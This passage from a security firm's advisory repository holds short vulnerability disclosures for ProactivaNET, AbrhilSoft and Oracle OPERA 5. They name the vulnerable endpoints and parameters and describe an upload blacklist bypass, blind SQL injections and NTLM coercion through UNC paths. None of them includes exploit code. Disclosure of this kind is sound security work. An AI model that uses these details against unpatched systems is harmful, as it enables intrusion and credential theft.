29 | * 31/08/2021 - A representative from Software AG asks for details
30 | * 30/03/2022 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
--------------------------------------------------------------------------------
/2022/CVE-2022-30977/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-30977: Remote Code Execution in ProactivaNET <= 10.14
2 | []() []() []()
3 |
4 | __Vendor:__ ProactivaNET
5 | __Vendor URL:__ https://www.proactivanet.com/discovery-gestion-de-activos
6 | __Versions affected:__ ProactivaNET <= 10.14
7 | __Discovered by:__ Pablo Martinez ([@xassiz](https://twitter.com/xassiz))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | ProactivaNET through 10.14 allows the unrestricted uploading of a Web.config file, resulting in OS command execution.
15 |
16 | ## Details
17 |
18 | The file upload functionality in the `/proactivanet/paw3/pages/insertImg/default.paw` endpoint does not properly validate the file extensions (other uploaders may be affected). It is possible to upload any file using capital letters for its extension, bypassing the blacklist.
19 |
20 | Even though script execution is disabled in the upload directory, a remote authenticated user can upload a Web.config file in order to execute arbitrary commands on the server.
21 |
22 | ## Impact
23 |
24 | Command execution can be achieved by uploading a Web.config file.
25 |
26 | ## Recommendation
27 |
28 | Update to the latest available version of the software.
29 |
30 | ## Timeline
31 | * 20/04/2022 - Reported vulnerability to vendor
32 | * 05/05/2022 - Meeting with the ProactivaNET team to explain the details
33 | * 16/08/2022 - Public Disclosure
34 |
35 | ------
36 |
37 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
38 |
39 |
--------------------------------------------------------------------------------
/2022/CVE-2022-30978/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-30978: SQL injection in ProactivaNET <= 10.14
2 | []() []() []()
3 |
4 | __Vendor:__ ProactivaNET
5 | __Vendor URL:__ https://www.proactivanet.com/discovery-gestion-de-activos
6 | __Versions affected:__ ProactivaNET <= 10.14
7 | __Discovered by:__ Guillermo Torre
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | ProactivaNET through 10.14 is prone to an unauthenticated SQL injection.
15 |
16 | ## Details
17 |
18 | The `pawLoginFormUserName` parameter in the ProactivaNET login request to the `/proactivanet/portal/ui/loginform/default.paw` endpoint is prone to a blind SQL injection.
19 |
20 | ## Impact
21 |
22 | This could lead to platform compromise, by bypassing authentication.
23 |
24 | ## Recommendation
25 | Update to the latest available version of the software.
26 |
27 | ## Timeline
28 | * 20/04/2022 - Reported vulnerability to vendor
29 | * 05/05/2022 - Meeting with the ProactivaNET team to explain the details
30 | * 16/08/2022 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
36 |
37 |
--------------------------------------------------------------------------------
/2022/CVE-2022-43216/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2022-43216: AbrhilSoft Employee's Portal SQL Injection
2 | []() []() []()
3 |
4 | __Vendor:__ ABRL SISTEMAS & PROYECTOS
5 | __Vendor URL:__ https://abrhil.com/
6 | __Versions affected:__ AbrhilSoft Employee's Portal "Lista de asistencia" <= ABR-MX-5.6.2
7 | __Discovered by:__ Antón Ortigueira ([@antuache](https://twitter.com/antuache))
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | AbrhilSoft Employee's Portal before v5.6.2 was discovered to contain a SQL injection vulnerability in the login page.
15 |
16 | ## Details
17 |
18 | The `clave` parameter included in the login request to the endpoint `/login/acceso` is prone to a blind SQL injection.
19 |
20 | ## Impact
21 |
22 | This could potentially result in the compromise of the platform due to the bypass of authentication mechanisms.
23 |
24 | ## Recommendation
25 |
26 | Update to the latest available version of the software.
27 |
28 | ## Timeline
29 | * 11/10/2022 - Reported vulnerability to vendor
30 | * 04/04/2024 - Public Disclosure
31 |
32 | ------
33 |
34 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
35 |
36 |
--------------------------------------------------------------------------------
/2024/CVE-2024-21172/Readme.md:
--------------------------------------------------------------------------------
1 | # CVE-2024-21172: CREDENTIAL EXFILTRATION VIA SMB
2 | []() []() []()
3 |
4 | __Vendor:__ Oracle Hospitality OPERA 5
5 | __Vendor URL:__ https://www.oracle.com/es/hospitality/products/opera-property-services/
6 | __Versions affected:__ 5.6.19.19, 5.6.25.8, 5.6.26.4
7 | __Discovered by:__ Marcos Díaz
8 | __Public fix:__ Yes
9 | __Proof of Concept:__ No
10 |
11 |
12 | ## Summary
13 |
14 | Oracle Hospitality OPERA 5 versions 5.6.19.19, 5.6.25.8 and 5.6.26.4 are affected by an NTLM authentication coercion vulnerability triggered via an HTTP request.
15 |
16 | ## Details
17 |
18 | The servlet `com.micros.opera.servlet.FileInfo` (**operainternalservlets.war**) can be used to coerce an NTLM authentication against an arbitrary SMB server using UNC paths.
19 |
20 | ## Impact
21 |
22 | Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5.
23 |
24 | ## Recommendation
25 |
26 | Update Oracle Hospitality OPERA 5.
27 |
28 | ## Timeline
29 |
30 | * 04/02/2024 - Vulnerability reported to vendor
31 | * 15/10/2024 - Public Disclosure
32 |
33 | ------
34 |
35 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
36 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 BlackArrow
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 |
4 |
5 | # Advisories & Proofs of Concept
6 | Our researchers at __BlackArrow__ often discover new and interesting vulnerabilities. In this repo we collect all of them, providing technical details and PoCs to easily replicate their findings.
7 |
8 | ## License
9 |
10 | All the code included in this project is licensed under the terms of the MIT license.
11 |
12 |
13 | #
14 |
15 | [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/)
16 |
--------------------------------------------------------------------------------
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/blackarrowsec/advisories/91d2aaa3eee5b7984aaefe3c7f052e905a9ed4f9/logo.png
--------------------------------------------------------------------------------